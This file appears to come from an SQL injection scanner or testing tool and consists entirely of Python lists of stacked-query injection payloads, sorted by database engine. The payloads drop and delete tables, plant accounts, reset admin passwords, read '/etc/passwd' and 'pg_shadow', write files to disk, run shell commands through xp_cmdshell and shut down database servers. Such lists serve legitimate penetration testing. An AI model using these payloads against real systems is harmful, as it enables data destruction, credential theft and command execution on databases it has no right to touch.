STACKED_PAYLOADS = [
    "'; SELECT 1--",
    "'; SELECT 1#",
    "'; SELECT 1/*",
    "'; SELECT 1,2--",
    "'; SELECT 1,2#",
    "'; SELECT 1,2,3--",
    "'; SELECT 1,2,3,4--",
    "'; DROP TABLE users--",
    "'; DROP TABLE users#",
    "'; DROP TABLE users/*",
    "'; DELETE FROM users WHERE 1=1--",
    "'; INSERT INTO users (username,password) VALUES ('hacker','pass')--",
    "'; UPDATE users SET password='hacked' WHERE username='admin'--",
    "'; CREATE TABLE test(id INT)--",
    "'; ALTER TABLE users ADD COLUMN hacked INT--",
    "'; EXEC sp_executesql N'select 1'--",
    "1; SELECT 1--",
    "1; SELECT 1#",
    "1; SELECT 1,2--",
    "1; DROP TABLE users--",
    "1; DELETE FROM users--",
    "1; INSERT INTO users VALUES (1,'test')--",
    "1; UPDATE users SET admin=1--",
    "1; CREATE TABLE test(x INT)--",
    "1; ALTER TABLE users DROP COLUMN password--",
    "') SELECT 1--",
    "') SELECT 1,2--",
    "') DROP TABLE users--",
    "') DELETE FROM users--",
    "') INSERT INTO users VALUES (1,'test')--",
    "')) SELECT 1--",
    "')) SELECT 1,2--",
    "')) DROP TABLE users--",
    "'; BEGIN SELECT 1; END--",
    "'; BEGIN SELECT 1,2; END--",
    "'; BEGIN DROP TABLE users; END--",
    "1; BEGIN TRANSACTION; DELETE FROM users; COMMIT--",
    "'; IF(1=1) SELECT 1--",
    "'; IF(1=1) DROP TABLE users ELSE SELECT 1--",
    "'; DECLARE @x INT=1; SELECT @x--",
    "'; DECLARE @sql VARCHAR(100); SET @sql='SELECT 1'; EXEC(@sql)--",
]

STACKED_PAYLOADS_MYSQL = [
    "'; SELECT @version--",
    "'; SELECT @@version--",
    "'; SELECT USER(),DATABASE()--",
    "'; SELECT table_name FROM information_schema.tables--",
    "'; SELECT column_name FROM information_schema.columns--",
    "'; SELECT * FROM users--",
    "'; SHOW TABLES--",
    "'; SHOW DATABASES--",
    "'; SHOW VARIABLES--",
    "'; SHOW STATUS--",
    "'; DESCRIBE users--",
    "'; LOAD DATA INFILE '/etc/passwd' INTO TABLE test--",
    "'; SELECT LOAD_FILE('/etc/passwd')--",
    "'; SELECT * INTO OUTFILE '/var/www/test.txt' FROM users--",
    "'; SET @a=1; SELECT @a--",
    "'; PREPARE stmt FROM 'SELECT 1'; EXECUTE stmt--",
    "'; PREPARE stmt FROM 'SELECT * FROM users'; EXECUTE stmt--",
    "'; HANDLER users OPEN; HANDLER users READ FIRST; HANDLER users CLOSE--",
    "'; DO SLEEP(5)--",
    "'; DO BENCHMARK(1000000,MD5('test'))--",
]

STACKED_PAYLOADS_POSTGRESQL = [
    "'; SELECT version()--",
    "'; SELECT current_user,current_database()--",
    "'; SELECT * FROM pg_user--",
    "'; SELECT * FROM pg_shadow--",
    "'; SELECT * FROM information_schema.tables--",
    "'; SELECT * FROM information_schema.columns--",
    "'; SELECT * FROM pg_tables--",
    "'; SELECT * FROM pg_database--",
    "'; SELECT * FROM pg_roles--",
    "'; COPY (SELECT * FROM users) TO '/tmp/users.csv'--",
    "'; COPY (SELECT * FROM users) TO '/tmp/users.csv' WITH CSV HEADER--",
    "'; DROP TABLE IF EXISTS users CASCADE; CREATE TABLE users();--",
    "'; SELECT pg_ls_dir('/tmp')--",
    "'; SELECT pg_read_file('/etc/passwd')--",
    "'; SELECT pg_write_file('/tmp/test', 'test')--",
    "'; LISTEN mychannel--",
    "'; NOTIFY mychannel, 'test'--",
]

STACKED_PAYLOADS_MSSQL = [
    "'; SELECT @@VERSION--",
    "'; SELECT USER_NAME(),DB_NAME(),@@VERSION--",
    "'; SELECT * FROM sys.databases--",
    "'; SELECT * FROM sys.tables--",
    "'; SELECT * FROM sys.columns--",
    "'; SELECT * FROM sys.sql_logins--",
    "'; SELECT * FROM sys.objects WHERE type='U'--",
    "'; EXEC sp_helpdb--",
    "'; EXEC sp_tables--",
    "'; EXEC sp_columns users--",
    "'; EXEC sp_executesql N'SELECT 1'--",
    "'; EXEC xp_cmdshell 'whoami'--",
    "'; EXEC xp_dirtree 'C:\\'--",
    "'; EXEC xp_fileexist 'C:\\boot.ini'--",
    "'; EXEC xp_logininfo--",
    "'; DECLARE @cmd VARCHAR(100); SET @cmd='whoami'; EXEC xp_cmdshell @cmd--",
    "'; SELECT 1 INTO #test--",
    "'; SELECT * INTO #users FROM users--",
    "'; EXEC (N'SELECT * FROM users')--",
    "'; EXEC (N'SELECT * FROM sys.databases')--",
]

STACKED_PAYLOADS_ORACLE = [
    "'; SELECT * FROM v$version--",
    "'; SELECT * FROM user_tables--",
    "'; SELECT * FROM user_tab_columns--",
    "'; SELECT * FROM user_views--",
    "'; SELECT * FROM user_synonyms--",
    "'; SELECT * FROM all_tables--",
    "'; SELECT * FROM all_tab_columns--",
    "'; SELECT * FROM all_views--",
    "'; SELECT * FROM all_synonyms--",
    "'; SELECT * FROM dba_tables--",
    "'; SELECT * FROM dba_tab_columns--",
    "'; SELECT * FROM dba_data_files--",
    "'; SELECT * FROM v$instance--",
    "'; SELECT * FROM v$database--",
    "'; SELECT * FROM v$session--",
    "'; SELECT * FROM v$process--",
    "'; SELECT DBMS_UTILITY.GET_TIME FROM DUAL--",
    "'; SELECT UTL_HTTP.REQUEST('http://test.com') FROM DUAL--",
    "'; SELECT DBMS_OBFUSCATION_TOOLKIT.MD5(input_string=>'test') FROM DUAL--",
    "'; SELECT DBMS_RANDOM.STRING('X',10) FROM DUAL--",
]

STACKED_PAYLOADS_SQLITE = [
    "'; SELECT sqlite_version()--",
    "'; SELECT * FROM sqlite_master--",
    "'; SELECT name FROM sqlite_master WHERE type='table'--",
    "'; SELECT sql FROM sqlite_master WHERE type='table'--",
    "'; SELECT * FROM sqlite_master WHERE type='table' AND name='users'--",
    "'; PRAGMA table_info(users)--",
    "'; PRAGMA database_list--",
    "'; PRAGMA journal_mode--",
    "'; PRAGMA synchronous--",
    "'; SELECT COUNT(*) FROM users--",
    "'; SELECT * FROM users LIMIT 1--",
    "'; ATTACH DATABASE '/tmp/test.db' AS test--",
    "'; CREATE TABLE test AS SELECT * FROM users--",
    "'; CREATE TABLE exploit(data TEXT)--",
    "'; INSERT INTO exploit VALUES('test')--",
]

DANGEROUS_PAYLOADS = [
    "'; SHUTDOWN WITH NOWAIT--",
    "'; KILL 1--",
    "'; FLUSH LOGS--",
    "'; RESET MASTER--",
    "'; SET GLOBAL general_log='ON'--",
    "'; SET GLOBAL slow_query_log='ON'--",
]

COMMENT_PAYLOADS = [
    "1'--",
    "1'#",
    "1'/*",
    "1'-- -",
    "1'--+",
    "1' #",
    "1' /*",
    "1'%23",
    "1'--",
    "1';--",
    "1';%23",
]
